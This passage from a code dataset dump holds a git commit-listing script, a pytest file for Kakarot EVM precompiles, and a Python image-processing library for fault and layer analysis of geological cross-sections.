user wants to monitor!\np = optparse.OptionParser()\np.add_option('--path', '-p', action='store', type=\"string\", default=\"\", help=\"Repository path\")\np.add_option('--since', '-s', action='store', type=\"string\", default=\"\", help=\"Starting point of interest\")\np.add_option('--until', '-u', action='store', type=\"string\", default=\"\", help=\"Until which date\")\np.add_option('--range', '-r', action='store', type=\"string\", default=\"\", help=\"Range of commits\")\np.add_option('--count', '-c', action='store', type=\"int\", default=\"-1\", help=\"Select n commits in this commit range\")\np.add_option('--interval', '-i', action='store', type=\"string\", default=\"\", help=\"Interval between commits\")\noptions, arguments = p.parse_args()\n\nif len(options.path) == 0:\n print (\"You need to specify a path to the git repo using -p.\")\n exit(1)\n\n# Move to the repo's list\nos.chdir(options.path)\n\n# Generate the call to git!\nrange_str = \"\"\nif len(options.range):\n range_str = options.range\nelif len(options.since):\n range_str += \"--since \" + options.since\n\ngitCommandLine = [\"/usr/bin/git\", \"log\", \"--oneline\", \"--date=short\"]\n\nif len(options.range) > 0:\n gitCommandLine.extend([options.range])\nif len(options.until):\n gitCommandLine.extend([\"--until\", options.until])\n\nresult = []\nif options.count >= 0:\n if len(options.since) > 0:\n gitCommandLine.extend([\"--since \", options.since])\n commitList = subprocess.check_output(gitCommandLine).decode().split(sep='\\n')\n step = len(commitList) / options.count\n for i in range(0, options.count):\n result.append(commitList[int(i * step)].split()[0])\nelif options.interval:\n gitCommandLine.extend([\"--reverse\"])\n date = options.since\n sys.stderr.write('Gathering commits: ')\n while True:\n gitCommandLineRound = list(gitCommandLine)\n gitCommandLineRound.extend([\"--since\", date])\n commitList = subprocess.check_output(gitCommandLineRound)\n if len(commitList) == 0:\n break\n commitList = commitList.decode().split(sep='\\n')\n result.append(commitList[0].split()[0])\n\n sys.stderr.write('.'); sys.stderr.flush()\n date = subprocess.check_output([\"date\", \"+%Y-%m-%d\", \"-d\", date + \" +\" + options.interval]).decode().split(sep='\\n')[0]\n\nsys.stderr.write('\\n'); sys.stderr.flush()\nprint (\" \".join(result))\n","repo_name":"tiagovignatti/ezbench","sub_path":"utils/get_commit_list.py","file_name":"get_commit_list.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"3712826724","text":"import pytest\nimport pytest_asyncio\nfrom starkware.starknet.testing.starknet import Starknet\n\n\n@pytest_asyncio.fixture(scope=\"module\")\nasync def precompiles(starknet: Starknet):\n class_hash = await starknet.deprecated_declare(\n source=\"./tests/src/kakarot/precompiles/test_precompiles.cairo\",\n cairo_path=[\"src\"],\n disable_hint_validation=True,\n )\n return await starknet.deploy(class_hash=class_hash.class_hash)\n\n\n@pytest.mark.asyncio\nclass TestPrecompiles:\n class TestRun:\n @pytest.mark.parametrize(\n \"address,error_message\",\n [\n (0x0, \"Kakarot: UnknownPrecompile 0\"),\n (0x2, \"Kakarot: NotImplementedPrecompile 2\"),\n (0x5, \"Kakarot: NotImplementedPrecompile 5\"),\n (0x6, \"Kakarot: NotImplementedPrecompile 6\"),\n (0x7, \"Kakarot: NotImplementedPrecompile 7\"),\n (0x8, \"Kakarot: NotImplementedPrecompile 8\"),\n ],\n )\n async def test__precompiles_run(self, precompiles, address, error_message):\n return_data, reverted = (\n await precompiles.test__precompiles_run(address=address).call()\n ).result\n assert bytes(return_data).decode() == error_message\n assert reverted\n\n class TestIsPrecompile:\n @pytest.mark.parametrize(\"address\", range(1, 11))\n async def test__is_precompile_should_return_true_up_to_9(\n self, precompiles, address\n ):\n is_precompile = (\n await precompiles.test__is_precompile(address).call()\n ).result[0]\n assert is_precompile == (address <= 0x9)\n","repo_name":"kkrt-labs/kakarot","sub_path":"tests/src/kakarot/precompiles/test_precompiles.py","file_name":"test_precompiles.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":722,"dataset":"github-code","pt":"96"} +{"seq_id":"43647450273","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 18 13:34:08 2018\n\n@author:Wei Huajing\n@company:Nanjing University\n@e-mail:jerryweihuajing@126.com\n\n@title:基于断层牵引法的平衡恢复函数库\n\"\"\"\n\nimport copy\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport object_fault_motion as o\n\n\"\"\"\n1) 调用函数中的函数不需要输入函数命名 \n2) copy和deepcopy的差别:是否改变地址\n\"\"\" \n \n#============================================================================== \n#输入路径path,读取图片,生成图片的rgb和灰度矩阵函数\n#参数show表示图片预览参数:默认为None,rgb表示开启rgb预览,gray表示灰度预览\ndef LoadImage(load_path,show=False):\n \n img_rgb=plt.imread(load_path) \n \n if show: \n #显示rgb图像\n plt.figure()\n plt.imshow(img_rgb) \n# plt.axis('off')\n \n return img_rgb\n\n#改变输入图像的尺寸:增加m行n列\ndef AddPadding(img_rgb,m,n,show=False):\n \n #改变图像的尺寸\n new_img_rgb_shape=(np.shape(img_rgb)[0]+m,\n np.shape(img_rgb)[1]+n,\n np.shape(img_rgb)[2])\n\n #这种定义背景方式最奏效\n #背景色\n background_rgb=np.array([255,255,255],dtype=np.uint8)\n \n #new_img_rgb视为底图\n new_img_rgb=np.full(new_img_rgb_shape,background_rgb) \n \n #着色\n mm,nn=int(np.floor(m/2)),int(np.floor(n/2))\n \n new_img_rgb[mm:-mm,nn:-nn]=img_rgb[:,:]\n \n if show: \n #显示rgb图像\n plt.figure()\n plt.imshow(new_img_rgb) \n# plt.axis('off')\n \n return new_img_rgb\n\n#============================================================================== \n#生成基础列表和字典\ndef GenerateListAndDict(img_rgb):\n \n #获取图中的所有地层rgb值\n layer_rgb_list=[]\n \n #well\n well=int(np.shape(img_rgb)[1]/2)\n j=well\n \n for i in range(np.shape(img_rgb)[0]):\n \n if list(img_rgb[i,j]) not in layer_rgb_list:\n \n layer_rgb_list.append(list(img_rgb[i,j]))\n \n #将矩阵拉长 \n img_rgb=img_rgb.reshape(1,np.shape(img_rgb)[0]*np.shape(img_rgb)[1],3)\n \n #获取三通道值\n img_r=img_rgb[:,:,0]\n img_g=img_rgb[:,:,1]\n img_b=img_rgb[:,:,2]\n \n #建立集合\n set_r=list(set(img_r[0]))\n set_g=list(set(img_g[0]))\n set_b=list(set(img_b[0]))\n \n #判断rgb三通道值的数量是否相等\n if len(set_r)==len(set_g)==len(set_b):\n \n #判断是否差一个断层颜色 \n if len(set_r)-len(layer_rgb_list)==1: \n \n #图像中的所有rgb-图中的所有地层rgb值\n fault_rgb=[] \n \n #删去layer_rgb_list有的元素,set_r,set_g,set_b与layer_rgb_list的差为断层rgb\n for item in layer_rgb_list:\n \n set_r.remove(item[0])\n set_g.remove(item[1])\n set_b.remove(item[2])\n \n #断层的rgb值\n fault_rgb=[set_r[-1],set_g[-1],set_b[-1]]\n \n #如果拾取的well刚好涉及到断层,需要通过几何特性来判断\n \"\"\"这里选取像素点最少的颜色为断层的rgb值\"\"\"\n if len(set_r)==len(layer_rgb_list):\n \n #各种颜色像素点数量的字典\n rgb_number_dict={}\n \n for k in range(len(layer_rgb_list)):\n \n rgb_number_dict[k]=np.sum(img_rgb==layer_rgb_list[k])\n \n #比较像素点数量的多少 \n key=list(rgb_number_dict.keys())\n value=list(rgb_number_dict.values())\n \n #得到断层的rgb值\n fault_rgb=layer_rgb_list[key[value.index(min(value))]]\n layer_rgb_list.remove(fault_rgb)\n \n #生成rgb_dict,包括layer和fault\n rgb_dict={}\n \n for i in range(len(layer_rgb_list)):\n \n rgb_dict[i+1]=layer_rgb_list[i]\n \n #索引-1代表断层fault\n rgb_dict[-1]=fault_rgb\n \n else:\n print('ERROR:重新填充')\n \n return fault_rgb,layer_rgb_list,rgb_dict\n\n#9.12\n\n#生成字典的初始化函数\ndef InitDict(img_rgb):\n \n rgb_list=[]\n \n for i in range(np.shape(img_rgb)[0]):\n \n for j in range(np.shape(img_rgb)[1]):\n \n if list(img_rgb[i,j].astype(int)) not in rgb_list:\n \n rgb_list.append(list(img_rgb[i,j].astype(int)))\n \n #判断背景色\n if [255,255,255] in rgb_list: \n rgb_list.remove([255,255,255]) \n \n #各种颜色像素点数量的字典\n rgb_number_dict={}\n \n for k in range(len(rgb_list)):\n \n rgb_number_dict[k]=np.sum(img_rgb==rgb_list[k])\n \n #比较像素点数量的多少 \n key=list(rgb_number_dict.keys())\n value=list(rgb_number_dict.values())\n \n #得到断层的rgb值\n fault_rgb=rgb_list[key[value.index(min(value))]]\n \n #只有layer的rgb\n import copy\n \n layer_rgb_list=copy.deepcopy(rgb_list)\n \n #删除fault的rgb\n layer_rgb_list.remove(fault_rgb)\n \n #生成rgb_dict,包括layer和fault\n rgb_dict={}\n \n for i in range(len(layer_rgb_list)):\n \n rgb_dict[i+1]=layer_rgb_list[i]\n \n #索引-1代表断层fault\n rgb_dict[-1]=fault_rgb\n \n #0代表背景色\n rgb_dict[0]=[255,255,255]\n \n #转化为img_tag\n img_tag=RGB2Tag(img_rgb,rgb_dict)\n \n #基底tag\n base_tag=GetBaseTag(img_tag)\n \n #基底egb\n base_rgb=rgb_dict[base_tag]\n \n #删除并重命名\n del rgb_dict[base_tag]\n \n #base_tag的索引定义为-2\n rgb_dict[-2]=base_rgb\n \n return rgb_dict\n\n#============================================================================== \n#字典按value搜索key\ndef DictKeyOfValue(dictionary,value):\n \n keys=list(dictionary.keys())\n values=list(dictionary.values())\n \n #要查询的值为value\n key=keys[values.index(value)]\n \n return key\n\n#获取字典子集的函数,从索引start到索引stop,不包括索引stop\ndef DictSlice(dictionary,start,stop):\n \n keys=list(dictionary.keys())\n values=list(dictionary.values()) \n \n new_dict={}\n \n for i in range(start,stop):\n new_dict[keys[i]]=values[i]\n \n return new_dict\n\n#以start为起始索引,将字典重新排序\ndef DictSortFromStart(dictionary,start):\n \n #两个字典切片\n new_dict_1=DictSlice(dictionary,start,len(dictionary))\n new_dict_2=DictSlice(dictionary,0,start)\n \n #建立新的索引列表\n keys=[]\n \n for item in list(new_dict_1.items()):\n keys.append(item[0])\n \n for item in list(new_dict_2.items()):\n keys.append(item[0])\n \n #建立新的值列表 \n values=[]\n \n for item in list(new_dict_1.items()):\n values.append(item[1])\n \n for item in list(new_dict_2.items()):\n values.append(item[1])\n \n #建立新的字典\n new_dict={}\n \n for k in range(len(dictionary)):\n new_dict[keys[k]]=values[k]\n \n return new_dict\n\n#10.16 \n#============================================================================== \n#将字典转化为频率统计字典 \ndef List2FrequencyDict(which_list):\n \n #建立集合列表\n element_list=list(set(which_list))\n \n #初始化频率列表\n frequency_list=[]\n \n #统计频率\n for this_element in element_list:\n \n that_frequency=0\n \n for element in which_list:\n \n if this_element==element:\n \n that_frequency+=1\n \n #将所有频数组合成列表\n frequency_list.append(that_frequency)\n \n #返回一个出现元素及其对应频率的列表\n return dict(zip(element_list,frequency_list))\n \n#定义一个列表中某值出现的函数\ndef CalculateFrequency(which_list,which_value):\n \n if which_value not in which_list:\n \n print('ERROR:the value not in this list')\n \n return\n \n if which_value in which_list:\n \n map_element_frequency=List2FrequencyDict(which_list)\n \n return map_element_frequency[which_value]\n \n#计算出列表中出现频率最高的元素的函数\ndef MostFrequentElement(which_list):\n \n #频率统计字典\n map_element_frequency=List2FrequencyDict(which_list)\n \n #最大频率\n the_frequency=max(list(map_element_frequency.values()))\n \n return DictKeyOfValue(List2FrequencyDict(which_list),the_frequency)\n\n#9.6\n#============================================================================== \n#补色变换\ndef ReverseRGB(img_rgb):\n \n return np.array([255,255,255]-img_rgb,dtype=np.uint8) \n\n#由img_rgb生成img_tag\ndef RGB2Tag(img_rgb,rgb_dict,show=False):\n \n img_tag=np.zeros((np.shape(img_rgb)[0],np.shape(img_rgb)[1]))\n \n #给img_tag矩阵赋值\n for i in range(np.shape(img_tag)[0]):\n \n for j in range(np.shape(img_tag)[1]):\n \n img_tag[i,j]=DictKeyOfValue(rgb_dict,list(img_rgb[i,j].astype(int)))\n \n #显示\n if show:\n plt.figure()\n plt.imshow(img_tag,cmap='gray')\n \n return img_tag\n\n#由img_tag生成img_rgb\ndef Tag2RGB(img_tag,rgb_dict,show=False):\n \n img_rgb=np.zeros((np.shape(img_tag)[0],np.shape(img_tag)[1],3))\n\n #给img_rgb矩阵赋值\n for i in range(np.shape(img_rgb)[0]):\n \n for j in range(np.shape(img_rgb)[1]):\n \n# print(img_tag[i,j])\n# print(rgb_dict[int(img_tag[i,j])])\n\n #注意dtype,必须是uint8才能正常显示RGB\n img_rgb[i,j]=np.array(rgb_dict[img_tag[i,j]])\n \n #转化为正确输出格式 \n img_rgb=np.array(img_rgb,dtype=np.uint8) \n \n #显示\n if show:\n \n plt.figure()\n plt.imshow(img_rgb)\n \n return img_rgb\n\n#9.13\n\n#计算出基底base tag的函数 设计一个\n#计算base_tag的方法\ndef GetBaseTag(img_tag):\n \n \"\"\"从图像末尾进行扫描,获取到的非背景色的tag或rgb就是\"\"\"\n for i in range(np.shape(img_tag)[0]-1,0,-1):\n \n #只要不是全空白那就一定是它咯\n if list(img_tag[i])!=list(img_tag[-1]): \n \n break\n \n #取中间值\n return img_tag[i,int(np.shape(img_tag)[1]/2)]\n\n#9.12\n#============================================================================== \n#初始化所有的fractions\ndef Initfractions(img_rgb,img_tag,rgb_dict,text=False,show=False,base='off'):\n \n #面积最大的tag\n base_tag=GetBaseTag(img_tag)\n \n #拾取出tag为2,3,4的层\n import copy\n \n fraction_rgb_dict=copy.deepcopy(rgb_dict)\n \n #删除空白rgb索引\n del fraction_rgb_dict[0]\n \n #图像中的所有fraction对象列表\n total_fractions=[]\n \n #拾取断层和地层并显示\n for this_tag in list(fraction_rgb_dict.keys()):\n \n #是否要基底的那个tag\n if base=='off':\n \n if this_tag==base_tag:\n \n continue\n \n that_fraction=PickSomething(img_rgb,img_tag,this_tag,rgb_dict)\n \n total_fractions+=that_fraction\n \n #显示total_fractions\n if show:\n ShowFractions(total_fractions,img_rgb,rgb_dict,text)\n \n return total_fractions\n \n#============================================================================== \n\"\"\"\n连通成分标记:基于链码的边界追踪算法\n从左往右,从上到下遍历所有像素点\n每个点的[i,j-1]方向为下标0的邻域,顺时针每个点的下标依次为0-7\n循环遍历,直到起点与终点的坐标相同\n\"\"\" \ndef Find1stPixel(tag,img_tag,content):\n \n #fault边缘点坐标集合\n edge=[] \n \n #开启标志\n flag=True \n \n #寻找值为tag的点的集合 \n for j in range(np.shape(img_tag)[1]):\n if flag==False:\n break \n \n for i in range(np.shape(img_tag)[0]): \n if img_tag[i,j]==tag:\n \n #第一个tag点的位置\n pos=[i,j] \n \n #判断新的的点是否存在与fault矩阵当中\n if pos not in content:\n edge.append(pos)\n flag=False\n break \n return edge\n\n\"\"\"\n以下情况需要特殊处理:\n1 S[k-1]邻域内的第一个点已在边缘集合当中,则访问下一个点 OK\n2 S[k]邻域内只有一个边缘点,即上一个点S[k-1],则访问S[k-1]邻域内下一个点 OK \n3 S[K]从上一个目标点是S[k-1]逆时针进行遍历 OK\n\"\"\" \n\n#寻找自己的第一个符合要求的邻居像素,要追踪的像素值为tag\n#第一个满足tag的pixel对象\ndef Find1stNeighbor(tag,flag_stop,edge,img_tag,index):\n \n #[i,j-1],[i+1,j-1],[i+1,j],[i+1,j+1],[i,j+1],[i-1,j+1],[i-1,j],[i-1,j-1]\n #邻域的索引和横纵坐标的索引(绝对索引)\n neighbordict={0:(0,-1),\n 1:(1,-1),\n 2:(1,0),\n 3:(1,1),\n 4:(0,1),\n 5:(-1,1),\n 6:(-1,0),\n 7:(-1,-1)}\n \n #以最后一个edge点为指针进行检索\n first_pixel=o.pixel()\n first_pixel.ypos=edge[-1][0]\n first_pixel.xpos=edge[-1][1]\n \n #3 S[K]从上一个目标点是S[k-1]逆时针进行遍历\n #重新规划索引new_index后一个索引和前一个索引呈对角关系\n #若索引大于4,归化\n\n if index<4:\n new_index=index+4\n else:\n new_index=index-4\n \n new_neighbordict=DictSortFromStart(neighbordict,new_index)\n \n #生成邻居列表,起始迭代邻居的索引\n first_pixel.GenerateNeighbor(img_tag)\n \n #邻域内邻居数量\n count=0\n\n for i in range(len(new_neighbordict)):\n \n #获取目标点的索引,转化为绝对索引\n index=list(new_neighbordict.keys())[i]\n \n #符合tag的点计数\n if first_pixel.neighbor[index]==tag:\n \n count+=1\n \n #建立新的pixel对象\n temp_pixel=o.pixel()\n temp_pixel.ypos=first_pixel.ypos+new_neighbordict[index][0]\n temp_pixel.xpos=first_pixel.xpos+new_neighbordict[index][1]\n pos=[temp_pixel.ypos,temp_pixel.xpos]\n \n #判断目标点和起点是否相同,不能是第一个点\n if i>0 and pos==edge[0]:\n \n flag_stop=True\n edge.append(pos)\n \n break\n \n #1 S[k-1]邻域内的第一个点已在边缘集合当中,则访问下一个点 \n if pos not in edge:\n \n edge.append(pos)\n \n break \n \n #*2 S[k]邻域内只有一个边缘点,即上一个点S[k-1],则访问S[k-1]邻域内下一个点\n if len(edge)>1 and pos==edge[-2] and count==1 and i==7:\n \n edge.append(pos)\n \n break\n \n return edge,index,flag_stop\n\n#根据fault_edge[0]追踪边界,要追踪的像素标签值为tag\ndef EdgeTracing(tag,edge,img_tag):\n \n #初始化循环中止判别标志\n flag_stop=False\n \n #初始化绝对索引\n index=-4\n \n #进行第一次邻居搜索\n edge,index,flag_stop=Find1stNeighbor(tag,flag_stop,edge,img_tag,index) \n \n while len(edge)>1 and flag_stop is False:\n edge,index,flag_stop=Find1stNeighbor(tag,flag_stop,edge,img_tag,index) \n \n return edge\n\n#============================================================================== \n#显示某个列表中的所有像素点\ndef ShowSomething(img_rgb,something,tag,rgb_dict,output=False): \n \n #显示找到的集合\n background_rgb=img_rgb[0,0]\n img_temp=np.full(np.shape(img_rgb),background_rgb)\n \n #赋予目标对象的位置\n for item in something:\n \n i,j=item[0],item[1]\n img_temp[i,j]=rgb_dict[tag] \n \n #在图中显示\n plt.figure()\n plt.imshow(img_temp)\n# plt.axis('off')\n \n if output:\n return img_temp\n \n\"\"\"设计通过显示tag和part显示块体的函数\"\"\"\n#写一个同时能显示很多tag像素点的函数,混合tag,显示对象为fraction对象的集合\n#显示多个fraction对象的函数\ndef ShowFractions(fractions,img_rgb,rgb_dict,text=False,output=False):\n \n #显示找到的内容\n background_rgb=img_rgb[0,0]\n img_temp=np.full(np.shape(img_rgb),background_rgb)\n \n #在图中显示\n plt.figure()\n \n #赋予目标对象的位置\n for this_fraction in fractions:\n \n #tag,part,content,center \n tag=this_fraction.tag\n part=this_fraction.part\n content=this_fraction.content\n center=this_fraction.center\n \n #着色\n for pos in content:\n i,j=pos[0],pos[1]\n img_temp[i,j]=rgb_dict[tag] \n \n if text: \n #annotate函数:s表示输出的文本,\n plt.annotate(s='tag'+' '+str(tag)+' '+'part'+' '+str(part),\n #xy表示中心点坐标\n xy=center,\n #xycoords表示输出类型,默认为'data'\n xycoords='data',\n #fontsize字体\n fontsize=10,\n #xytext和textcoords='offset points'对于标注位置的描述和x偏差值\n textcoords='offset points',\n #4个字符相当于2个fontsize\n xytext=(-20,0)) \n\n plt.imshow(img_temp)\n# plt.axis('off')\n \n if output:\n return img_temp\n \n#显示多个plate对象的函数\n#plates是plate对象组成的列表\ndef ShowPlates(plates,img_rgb,rgb_dict,text=False,output=False):\n \n #建立总fractions列表\n total_fractions=[]\n \n #遍历plates中的每一个plate\n for this_plate in plates:\n\n #将每一个fraction对象都放进来\n total_fractions+=this_plate.fractions\n \n #显示\n ShowFractions(total_fractions,img_rgb,rgb_dict,text,output) \n \n#============================================================================== \n\"\"\"算的太慢!!!,只能缩小尺寸\"\"\" \n\"\"\"\n填充方法:\n1 填充边界内的点,向内侵蚀\n2 阿华算法:IJ交织(已改进,解决了拾取本不该属于集合里的点的问题)\n\"\"\"\n#提取出tag值的像素点坐标的集合\ndef PickSomething(img_rgb,img_tag,tag,rgb_dict,show=False,text=False,output=False):\n \n #content_sum=Content[0]+Content[1]+...\n content_sum=[] \n \n #method=1代表方法1,method=2代表方法2\n method=2 \n \n #复制生成临时的img_tag,用于标记已上色的像素点\n temp_img_tag=copy.deepcopy(img_tag) \n \n #是否继续遍历的标志 \n content_flag=tag in temp_img_tag \n \n #块体tag a part b的重心坐标\n Center={} \n \n #Center字典增加一个新的tag列表\n Center[tag]=[] \n \n #fractions是fraction对象的集合\n fractions=[] \n \n# #已知对象数量时可以这么干\n# number=3\n# for kk in range(number):\n \n \"\"\"1 内部膨胀的方法增加像素点\"\"\" \n if method==1: \n \n #以下部分进行循环\n while content_flag: \n \n #fault像素点集合的生成\n content=[]\n \n #寻找第一个特征值值点\n fault_edge,content_flag=Find1stPixel(tag,img_tag,content_sum) \n \n #追踪fault的边界\n fault_edge=EdgeTracing(tag,fault_edge,img_tag)\n \n #内部膨胀的方法增加像素点 \n neighbordict={0:(0,-1),\n 1:(1,-1),\n 2:(1,0),\n 3:(1,1),\n 4:(0,1),\n 5:(-1,1),\n 6:(-1,0),\n 7:(-1,-1)}\n \n #将边界存入fault列表当中\n new_edge=fault_edge\n content+=new_edge\n \n #只要每一轮添加的点的数量不为0就执行循环\n while len(new_edge): \n \n #上一轮添加的点\n last_edge=new_edge\n \n #这一轮新添加的点坐标的列表\n new_edge=[]\n \n for k in range(len(last_edge)):\n \n #建立新的pixel对象\n temp_pixel=o.pixel()\n temp_pixel.ypos=last_edge[k][0]\n temp_pixel.xpos=last_edge[k][1] \n \n #生成邻居列表,起始迭代邻居的索引\n temp_pixel.GenerateNeighbor(img_tag) \n \n for i in range(len(neighbordict)): \n \n #判断标签为tag\n if temp_pixel.neighbor[i]==tag:\n \n #邻居的坐标\n new_y=temp_pixel.ypos+neighbordict[i][0]\n new_x=temp_pixel.xpos+neighbordict[i][1]\n pos=[new_y,new_x]\n \n #新的点在不在fault列表内\n if pos not in o.fault:\n new_edge.append(pos) \n \n #将新捕捉的点存入fault列表当中 \n content+=new_edge \n \n \"\"\"2 阿华法增加像素点\"\"\"\n if method==2:\n \n #以下部分进行循环\n while content_flag: \n \n# 已知个数的情况\n# number=2\n# for kk in range(number): \n \n #装逼用 \n print('')\n print('...')\n print('......')\n print('.........')\n print('tag',tag,'part',len(fractions),':')\n \n #寻找第一个特征值值点\n edge=Find1stPixel(tag,img_tag,content_sum)\n\n #追踪content的边界\n edge=EdgeTracing(tag,edge,img_tag)\n \n #this_fraction表示正在处理的fraction\n \n #如果tag=-1,则fraction为fault\n if tag==-1:\n this_fraction=o.fault() \n else:\n this_fraction=o.layer() \n \n #对tag属性赋值\n this_fraction.tag=tag \n \n #给part属性赋值\n this_fraction.part=len(fractions)\n \n #给edge属性赋值\n this_fraction.edge=edge\n \n #求对象的范围矩阵\n #left right bottom top 这几个重要的参数\n I=[]\n J=[]\n \n for item in edge: \n if item[0] not in I: \n I.append(item[0])\n \n if item[1] not in J:\n J.append(item[1])\n \n #初始生成的I,J不是按顺序的,需要对其进行排序\n I.sort()\n J.sort() \n \n left,right=min(J),max(J)\n bottom,top=min(I),max(I)\n \n #获取块体的中点\n center_x=(left+right)/2\n center_y=(bottom+top)/2\n \n #标注的坐标,即块体Content[part]的中点\n center=(center_x,center_y)\n \n #对center属性赋值\n this_fraction.center=center\n \n Center[tag].append(center)\n \n #建立某特殊的数据结构,用于存放像素点的行对应的列\n row_column=[]\n column_row=[]\n \n \"\"\"is和==不一样\"\"\" \n for i in range(top-bottom+1):\n \n #行对应的列的列表\n column=[]\n for item in edge:\n if item[0]==I[i]:\n column.append(item[1])\n column.sort()\n \n #列表添加至大列表当中\n row_column.append(column)\n \n for j in range(right-left+1):\n \n #列对应的行的列表\n row=[]\n for item in edge:\n if item[1]==J[j]:\n row.append(item[0])\n row.sort()\n \n #列表添加至大列表当中\n column_row.append(row) \n \n #检验这两个数组的正确性\n sum_i,sum_j=0,0\n \n for item in row_column:\n sum_j+=len(item)\n \n for item in column_row:\n sum_i+=len(item)\n \n #设置验证门槛\n #J\n if sum_j==len(edge):\n print('row_column is OK')\n flag_j=True\n #I\n if sum_i==len(edge):\n print('column_row is OK')\n flag_i=True\n #IJ\n if sum_j==sum_i:\n if flag_i and flag_j:\n flag=True\n \n if flag is True:\n \"\"\"\n 注意:\n 过一个点做垂线和水平线可能会碰到交点是三个以上,如果其中有轮廓线的切点,就会出现判断失误 \n \n 设置节点:\n 每个节点两段点之间遍历,若符合tag要求即加入集合当中\n \"\"\" \n #在row_column和column_row当中建立合适的节点,将相邻的像素点用其中头尾节点来表示 \n \n #content像素点集合\n content=[] \n \n #row_column \n row_column_node=[] \n for r in range(len(row_column)):\n\n #要删除的列表\n column_to_delete=[]\n \n if len(row_column[r])>2:\n \n #元素数量大于2时才成立 \n for c in range(1,len(row_column[r])-1): \n\n bool_former=(row_column[r][c+1]-row_column[r][c]==1) \n bool_latter=(row_column[r][c]-row_column[r][c-1]==1)\n \n #直接删除中间元素 \n if bool_former and bool_latter:\n \n #建立需要删除元素的列表\n column_to_delete.append(row_column[r][c])\n \n #要增加的节点列表\n column_node=[]\n \n \"\"\"若不加这步骤,则没法把孤苦伶点的点收录进来\"\"\"\n if len(row_column[r])==1:\n column_node=row_column[r]*2\n \n else: \n #将某些元素删除\n \n for item in row_column[r]:\n if item not in column_to_delete:\n column_node.append(item)\n\n row_column_node.append(column_node)\n\n #修复方法\n fix=False\n \n #确认是否存在两个以下的节点\n if fix: \n for item in row_column_node:\n if len(item)!=2:\n print(item) \n \n #进行轮廓内部填充 \n fashion='new'\n \n #老办法,用于检验,在不特殊的情况下能得到正确答案\n #如果只有两个节点时直接用老方法填充,比较快\n if fashion=='old':\n \n for i in range(top-bottom+1): \n for j in range(right-left+1):\n \n #用abcd代替更简便\n a,b=min(row_column[i]),max(row_column[i])\n c,d=min(column_row[j]),max(column_row[j])\n \n #绝对坐标\n absolute_i=bottom+i\n absolute_j=left+j\n \n #判断是否在区域内\n if a<=absolute_j<=b and c<=absolute_i<=d:\n pos=[absolute_i,absolute_j]\n content.append(pos) \n \n #对上色过的像素点赋予tag=0\n temp_img_tag[int(pos[0]),int(pos[1])]=0 \n \n #适用于所有情况 \n if fashion=='new':\n \n for i in range(top-bottom+1): \n #行坐标欸\n row=bottom+i\n \n #列坐标 \n for ii in range(len(row_column_node[i])-1):\n \n #这个列坐标区间内的tag进行判断\n #column=(row_column[i][ii],row_column[i][ii+1])\n \n start_j=row_column_node[i][ii]\n stop_j=row_column_node[i][ii+1]\n \n #如果区间内全是符合tag的点,则加如集合\n \n \"\"\"用向量进行赋值速度快\"\"\"\n if list(img_tag[row,start_j:stop_j])==[tag]*(stop_j-start_j):\n \n #对上色过的像素点赋予tag\n temp_img_tag[row,start_j:stop_j]=0\n \n for column in range(start_j,stop_j):\n pos=[row,column]\n \n if pos not in content:\n content.append(pos) \n \n #确保边缘被收录\n for column in row_column_node[i]: \n pos=[row,column]\n \n if pos not in content:\n content.append(pos) \n \n #对上色过的像素点赋予tag=0\n temp_img_tag[int(pos[0]),int(pos[1])]=0\n \n #复制结果\n content_row_column=copy.deepcopy(content)\n \n #重新定义content像素点集合\n content=[] \n \n #column_row \n column_row_node=[] \n for c in range(len(column_row)):\n \n #要删除的列表\n row_to_delete=[]\n \n if len(column_row[c])>2:\n \n #元素数量大于2时才成立 \n for r in range(1,len(column_row[c])-1): \n\n bool_former=(column_row[c][r+1]-column_row[c][r]==1) \n bool_latter=(column_row[c][r]-column_row[c][r-1]==1)\n \n #直接删除中间元素 \n if bool_former and bool_latter:\n \n #建立需要删除元素的列表\n row_to_delete.append(column_row[c][r])\n \n #要增加的节点列表\n row_node=[]\n \n #把孤苦伶点的点收录进来\n if len(column_row[c])==1:\n row_node=column_row[c]*2\n \n else: \n #将某些元素删除 \n for item in column_row[c]:\n if item not in row_to_delete:\n row_node.append(item)\n\n column_row_node.append(row_node)\n \n #进行轮廓内部填充 \n #适用于所有情况\n for j in range(right-left+1): \n #行坐标欸\n column=left+j\n\n #列坐标 \n for jj in range(len(column_row_node[j])-1):\n \n #这个列坐标区间内的tag进行判断\n #row=(column_row[j][jj],column_row[j][jj+1])\n \n start_i=column_row_node[j][jj]\n stop_i=column_row_node[j][jj+1]\n \n #如果区间内全是符合tag的点,则加如集合\n \n \"\"\"用向量进行赋值速度快\"\"\"\n if list(img_tag[start_i:stop_i,column])==[tag]*(stop_i-start_i):\n \n #对上色过的像素点赋予tag\n temp_img_tag[start_i:stop_i,column]=0\n\n for row in range(start_i,stop_i):\n \n pos=[row,column]\n \n if pos not in content:\n content.append(pos) \n \n #确保边缘被收录\n for row in column_row_node[j]: \n \n pos=[row,column]\n \n if pos not in content:\n \n content.append(pos) \n \n #对上色过的像素点赋予tag=0\n temp_img_tag[int(pos[0]),int(pos[1])]=0 \n \n #复制结果\n content_column_row=copy.deepcopy(content)\n \n #互相验证两种收集模式的结果:比较两集合结果是否相等 \n verification=True \n for item in content_column_row:\n if item not in content_row_column:\n verification=False\n \n if verification: \n #判断结果的count\n count_for_judge=0\n \n #判断content是否包含了edge\n for item in edge:\n if item in content:\n count_for_judge+=1\n \n #判断列表长度是否相等 \n if count_for_judge==len(edge):\n print('content includes edge')\n \n #对content属性赋值\n this_fraction.content=content\n \n #content_sum=Content[0]+Content[1]+...\n content_sum+=content\n \n #Content[0],Content[1]是每个块体像素点的集合\n fractions.append(this_fraction)\n \n #判断循环是否需要中止:1和2代表不同方法 \n method_for_stop=2\n \n \"\"\"1 判断条件为新的img_tag是否还存在标签值\"\"\"\n #这种方法要特别久 \n if method_for_stop==1: \n \n #符合条件的tag不在content_sum中的数量\n count_for_stop=0\n for i in range(np.shape(img_tag)[0]):\n for j in range(np.shape(img_tag)[1]):\n if img_tag[i,j]==tag:\n pos=[i,j]\n if pos not in content_sum:\n count_for_stop+=1\n \n #循环结束的判断条件 \n if count_for_stop==0:\n content_flag=False\n \n \"\"\"2 